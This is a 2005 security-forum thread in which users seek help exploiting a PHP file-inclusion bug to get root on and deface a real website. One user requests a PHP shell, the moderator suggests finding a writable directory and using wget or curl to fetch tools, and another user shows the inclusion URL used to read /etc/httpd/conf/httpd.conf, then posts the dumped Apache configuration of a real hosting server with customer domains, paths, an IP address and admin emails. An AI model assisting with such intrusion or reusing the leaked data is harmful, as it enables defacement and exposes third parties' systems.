 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 114
 Members: 0
 Total: 114
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
how to deface a site, which contains a php injection bug? |
|
 Posted: Sun Oct 02, 2005 12:01 pm |
 |
|
| Pouya |
| Regular user |
 |
|
| Joined: Sep 11, 2005 |
| Posts: 6 |
|
|
|
 |
|
 |
|
howdy dudes 
I found a site, which contains a php injection bug. Safemode is off, but i cannot open the /var/tmp/ or /tmp/ directory :/
I cannot upload an local exploit or a connect back and therefore i cannot execute anything. Nothing works, how can i get root and deface that page?
Here is the vuln php injection page:
http://-------/index.php?go=<and here your shell>
Can anybody help me please!!!
Thx
EDITED :NOT ADD REAL URL READ THE RULES by LINUX |
|
|
|
|
| Posted: Mon Oct 03, 2005 7:41 pm |
|
|
| Pouya |
| Regular user |
|
|
| Joined: Sep 11, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
Can anybody help me please???
P.S.: I need a good php shell. If anybody knows one, please post here!!
Thx!! |
|
|
|
|
| Posted: Wed Oct 05, 2005 12:55 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
well ......
u won't have great success to exploit that machine (as far as i see right now).
u have permission to read, but write to the current directory? u cant even open /etc/shadow or the parent directory (..).
u get something like this here:
| Quote: | Warning: main(/tmp/): failed to open stream: Permission denied in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95
Warning: main(/tmp/): failed to open stream: Permission denied in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95
Warning: main(): Failed opening '/tmp/' for inclusion (include_path='./:/usr/share/pear/') in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95 |
Also Finger weg  |
|
|
|
|
| Posted: Wed Oct 05, 2005 1:29 pm |
|
|
| fizzi |
| Advanced user |
|
|
| Joined: Sep 14, 2005 |
| Posts: 55 |
|
|
|
|
|
|
|
|
|
|
|
|
Re: how to deface a site, which contains a php injection bug |
|
| Posted: Wed Oct 05, 2005 4:48 pm |
|
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| Pouya wrote: | howdy dudes
I found a site, which contains a php injection bug. Safemode is off, but i cannot open the /var/tmp/ or /tmp/ directory :/
I cannot upload an local exploit or a connect back and therefore i cannot execute anything. Nothing works, how can i get root and deface that page?
Here is the vuln php injection page:
http://-------/index.php?go=<and here your shell>
Can anybody help me please!!!
Thx
EDITED :NOT ADD REAL URL READ THE RULES by LINUX |
first you need know kernel have this box, second you need write in one dir try search DIR (apache proxy) (/dev/shm) or other 3 need wget GET curl lynx you have this?
 Remember never add REAl url here |
|
|
|
|
|
|
|
|
| Posted: Sun Nov 13, 2005 12:39 pm |
|
|
| Kiki |
| Regular user |
|
|
| Joined: Nov 13, 2005 |
| Posts: 7 |
| Location: Italy |
|
|
|
|
|
|
Hello, this is my first one post,I'm Italian and excused me for English my bad english... I wanted to know in that way I can upp one shell using http://.....index.php?go= and like using it...
Sorry for my bed english... 
Kiki |
|
|
|
|
|
hello |
|
| Posted: Wed Nov 30, 2005 3:12 pm |
|
|
| easy_management |
| Regular user |
|
|
| Joined: Nov 24, 2005 |
| Posts: 12 |
|
|
|
|
|
|
|
|
|
|
|
|
|
ok i captured the httpd.conf |
|
| Posted: Thu Dec 01, 2005 7:35 pm |
|
|
| easy_management |
| Regular user |
|
|
| Joined: Nov 24, 2005 |
| Posts: 12 |
|
|
|
|
|
|
|
i captured httpd.conf
and i try with logs/access_log
plz don't write script php in access coz if u have error u breaking the runing the code source
http://xxxxxxxxxxxxxxxxxxxxxxxxxxx/index.php?go=/etc/httpd/conf/httpd.conf
## DO NOT EDIT ON WEBPACKSERVER ... IT's AUTOGENERATED BY SKD
##
## httpd.conf -- Apache HTTP server configuration file
##
## Config for Serverpool WebPack L-XXL, Ded. L-XXL
## $Id: httpd.conf,v 1.22 2005/09/16 11:11:31 mf Exp $
##
LoadModule php4_module libexec/libphp4.so
LoadModule frontpage_module libexec/mod_frontpage.so
LoadModule vhost_limit_module libexec/mod_vhost_limit.so
ServerType standalone
Port 80
#HostnameLookups on
HostnameLookups off
User nobody
Group nobody
ServerAdmin tt@hosteurope.de
ServerRoot "/usr/local/apache"
ErrorLog /var/log/httpd/error_log
LogLevel warn
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Host}i\"" combined
LogFormat "127.0.0.1 %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{Host}i\"" combined-anonymous
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
CustomLog /var/log/httpd/access_log common
PidFile /usr/local/apache/var/run/httpd.pid
ScoreBoardFile /usr/local/apache/var/run/httpd.scoreboard
ExtendedStatus On
ServerSignature on
UseCanonicalName on
KeepAlive On
DocumentRoot "/is/default.htdocs"
DirectoryIndex index.html index.htm index.shtml index.php index.php4 index.php5 index.php3 index.wml
FancyIndexing on
AddIconByEncoding (CMP,/icons-used-by-apache/compressed.gif) x-compress x-gzip
AddIconByType (TXT,/icons-used-by-apache/text.gif) text/*
AddIconByType (IMG,/icons-used-by-apache/image2.gif) image/*
AddIconByType (SND,/icons-used-by-apache/sound2.gif) audio/*
AddIconByType (VID,/icons-used-by-apache/movie.gif) video/*
AddIcon /icons-used-by-apache/binary.gif .bin .exe
AddIcon /icons-used-by-apache/binhex.gif .hqx
AddIcon /icons-used-by-apache/tar.gif .tar
AddIcon /icons-used-by-apache/world2.gif .wrl .wrl.gz .vrml .vrm .iv
AddIcon /icons-used-by-apache/compressed.gif .Z .z .tgz .gz .zip
AddIcon /icons-used-by-apache/a.gif .ps .ai .eps
AddIcon /icons-used-by-apache/layout.gif .html .shtml .htm .pdf
AddIcon /icons-used-by-apache/text.gif .txt
AddIcon /icons-used-by-apache/c.gif .c
AddIcon /icons-used-by-apache/p.gif .pl .py
AddIcon /icons-used-by-apache/f.gif .for
AddIcon /icons-used-by-apache/dvi.gif .dvi
AddIcon /icons-used-by-apache/uuencoded.gif .uu
AddIcon /icons-used-by-apache/script.gif .conf .sh .shar .csh .ksh .tcl
AddIcon /icons-used-by-apache/tex.gif .tex
AddIcon /icons-used-by-apache/bomb.gif core
AddIcon /icons-used-by-apache/back.gif ..
AddIcon /icons-used-by-apache/hand.right.gif README
AddIcon /icons-used-by-apache/folder.gif ^^DIRECTORY^^
AddIcon /icons-used-by-apache/blank.gif ^^BLANKICON^^
DefaultIcon /icons-used-by-apache/unknown.gif
ReadmeName README
HeaderName HEADER
IndexIgnore .??* *~ *# HEADER* README* RCS
TypesConfig /usr/local/apache/etc/mime.types
DefaultType text/plain
AddEncoding x-compress Z
AddEncoding x-gzip gz
AddLanguage en .en
AddLanguage fr .fr
AddLanguage de .de
AddLanguage da .da
AddLanguage el .el
AddLanguage nl .nl
AddLanguage it .it
AddLanguage pl .po
AddLanguage ru .ru
AddLanguage es .es
AddLanguage tr .tr
AddLanguage pt .pt
AddLanguage fi .fi
LanguagePriority de en fr
##ACHTUNG#
# der von Apache benutzte Pfad lautet /icons-used-by-apache/ ,weil /icons/
# schon von einigen Kunden benutzt wurde
Alias /icons-used-by-apache/ "/is/default.htdocs/icons-used-by-apache/"
# dieser Eintrag gilt nur fuer Hauptdomains und da wurde /icons/ schon immer
# richtig verlinkt und deshalb bleibt der auch.
Alias /icons/ "/is/default.htdocs/icons-used-by-apache/"
AddType text/html .shtml
AddHandler server-parsed .shtml
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
AddType application/x-httpd-php .php3
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php
AddType application/x-httpd-cgi .php5
ErrorDocument 404 /missing.html
ErrorDocument 500 http://pics.hosteurope.de/error500.html
BrowserMatch "Mozilla/2" nokeepalive
BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
BrowserMatch "MSIE" force-no-vary
BrowserMatch "RealPlayer 4\.0" force-response-1.0
BrowserMatch "Java/1\.0" force-response-1.0
BrowserMatch "JDK/1\.0" force-response-1.0
# rewrite Engine wird benoetigt um das MultidomainHosting zu ermoeglichen
RewriteEngine on
#RewriteLog /var/log/httpd/rewrite.log
# up to 9 if you need it, 0 means "log nothing"
#RewriteLogLevel 0
####################### MAP Aliasdomains Directory #####################
RewriteMap lowercase int:tolower
RewriteMap vhost txt:/usr/local/apache/etc/vhost-mdh.txt
# 2. make sure we have a Host header, because
# currently our approach only supports
# virtual hosting through this header
RewriteCond %{HTTP_HOST} !^$
# 3. lowercase the hostname
RewriteCond ${lowercase:%{HTTP_HOST}|NONE} ^([^:]+)(:[0-9]*)?$
# 4. lookup this hostname in vhost.map and
# remember it only when it is a path
# (and not "NONE" from above)
RewriteCond ${vhost:%1} ^(/.*)$
# 5. finally we can map the URL to its docroot location
RewriteRule ^/(.*)$ %{DOCUMENT_ROOT}%1/$1 [C]
####################### Fix "/" Problem ##############################
# 6. If the map of step 5 occurs ... then also check,
# if the requested "file" is an Directory (to avoid "/" Problems)
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+[^/])$ http://%{HTTP_HOST}%{REQUEST_URI}/ [R,L]
####################### Activate CGI execution #####################
# 7. Allow cgi-bin in ALL Subdirectories
RewriteRule /cgi-bin/ - [T=application/x-httpd-cgi] [L]
####################### Icons Alias ####################################
# 8. Allow icons also in Aliasdomains
RewriteRule /icons-used-by-apache/(.*) /is/default.htdocs/icons-used-by-apache/$1 [L]
# 9. Allow ErrorDocument in Aliasdomains
RewriteRule /globalhererrordocuments/(.*) /is/default.errors/$1 [L]
# that all folks
###Und in jeden Virtualhostconfig muss noch rein:
# RewriteEngine on
# RewriteOptions inherit
#################### end of rewrite engine
Alias /globalhererrordocuments/ /is/default.errors/
<LocationMatch "^/$>
ErrorDocument 403 /globalhererrordocuments/noindex.html
</LocationMatch>
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory "/is/htdocs">
Options -Indexes FollowSymLinks Includes ExecCGI MultiViews
AllowOverride All
order allow,deny
allow from all
</Directory>
<Location /server-status>
SetHandler server-status
order deny,allow
deny from all
allow from 192.168.70.0/255.255.255.0 192.168.67.0/255.255.255.0
</Location>
<Location /server-info>
SetHandler server-info
order deny,allow
deny from all
allow from 192.168.70.0/255.255.255.0 192.168.67.0/255.255.255.0
</Location>
<Files .ht*>
order allow,deny
deny from all
</Files>
AccessFileName .htaccess
<Directory /is/default.htdocs>
<files phpinfo.php>
Order Deny,Allow
Deny from all
Allow from intern.hosteurope.de vpn.hosteurope.de
</files>
</Directory>
<Directory /is/default.htdocs/stats>
Order deny,allow
Deny from all
Allow from .intern.hosteurope.de
Allow from .vpn.hosteurope.de
AddHandler cgi-script .pl
Options ExecCGI
</Directory>
# f?r einzelne Eintraege auf verschiedenen WebPackservern:
Include /usr/local/apache/conf/httpd.conf.edit-manually.inc
Timeout 300
MaxKeepAliveRequests 100
KeepAliveTimeout 5
MinSpareServers 50
MaxSpareServers 80
StartServers 50
MaxClients 300
MaxRequestsPerChild 120
NameVirtualHost 80.237.130.43
ServerName server035.webpack.hosteurope.de
<VirtualHost 80.237.130.43>
DocumentRoot /is/default.htdocs
MaxVhostClients 50
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/39789/www.4-office.de
ServerAdmin webmaster@4-office.de
ServerName www.4-office.de
ServerAlias 4-office.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/39789/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.4-office.de combined
ErrorLog logs/error_log.www.4-office.de
RewriteEngine on
RewriteOptions inherit
ServerAlias f4e-intern.de www.f4e-intern.de nhl4ever.de www.nhl4ever.de nba4ever.de www.nba4ever.de fifa4ever.de www.fifa4ever.de training-office.de www.training-office.de fifapro.de www.fifapro.de fifa-academy.de www.fifa-academy.de multisportgames.de www.multisportgames.de handball-reichshof.de www.handball-reichshof.de
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/39789/www.4-office.de/ps2/
ScriptAliasMatch ^(.*)/cgi-bin/(.*) /is/htdocs/39789/www.4-office.de/ps2$1/cgi-bin/$2
ServerAdmin webmaster@4-office.de
ServerName ps2.fifa4ever.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/39789/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.4-office.de combined
ErrorLog logs/error_log.www.4-office.de
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/57078/www.hls-mgh.de
ServerAdmin webmaster@hls-mgh.de
ServerName www.hls-mgh.de
ServerAlias hls-mgh.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/57078/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.hls-mgh.de combined
ErrorLog logs/error_log.www.hls-mgh.de
ScriptAliasMatch ^(.*)/cgi-bin/(.*) /is/htdocs/57078/www.hls-mgh.de$1/cgi-bin/$2
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/57535/www.electronic-v.de
ServerAdmin webmaster@electronic-v.de
ServerName www.electronic-v.de
ServerAlias electronic-v.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/57535/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.electronic-v.de combined
ErrorLog logs/error_log.www.electronic-v.de
RewriteEngine on
RewriteOptions inherit
ServerAlias disneysarielle.de www.disneysarielle.de the-red-line.de www.the-red-line.de
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/57551/www.casandras.de
ServerAdmin webmaster@casandras.de
ServerName www.casandras.de
ServerAlias casandras.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/57551/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.casandras.de combined
ErrorLog logs/error_log.www.casandras.de
RewriteEngine on
RewriteOptions inherit
ServerAlias delphin-land.de www.delphin-land.de teddybearland.de www.teddybearland.de dubistdu.de www.dubistdu.de netobject-fusion.de www.netobject-fusion.de my-fantasy-world.de www.my-fantasy-world.de homeli.de www.homeli.de
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/57882/www.hambastegibarayeazadiiran.com
ServerAdmin webmaster@hambastegibarayeazadiiran.com
ServerName www.hambastegibarayeazadiiran.com
ServerAlias hambastegibarayeazadiiran.com
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/57882/
php_admin_flag display_errors Off
php_admin_flag log_errors On
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.hambastegibarayeazadiiran.com combined
ErrorLog logs/error_log.www.hambastegibarayeazadiiran.com
RewriteEngine on
RewriteOptions inherit
ServerAlias 30min.org www.30min.org hambastegi.de www.hambastegi.de
MaxVhostClients 70
</VirtualHost>
<VirtualHost 80.237.130.43>
DocumentRoot /is/htdocs/58183/www.th-textkommunikation.de
ServerAdmin webmaster@th-textkommunikation.de
ServerName www.th-textkommunikation.de
ServerAlias th-textkommunikation.de
php_admin_value open_basedir /tmp/:/bin/:/usr/:/is/htdocs/58183/
RLimitCPU 150 180
RLimitMEM 33554432 40265318.4
CustomLog logs/access_log.www.th-textkommunikation.de combined
ErrorLog logs/error_log.www.th-textkommunikation.de
ScriptAliasMatch ^(.*)/cgi-bin/(.*) /is/htdocs/58183/www.th-textkommunikation.de$1/cgi-bin/$2
MaxVhostClients 70
</VirtualHost>
Include /usr/local/apache/conf/httpd.conf.non-frontpage.inc |
|
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
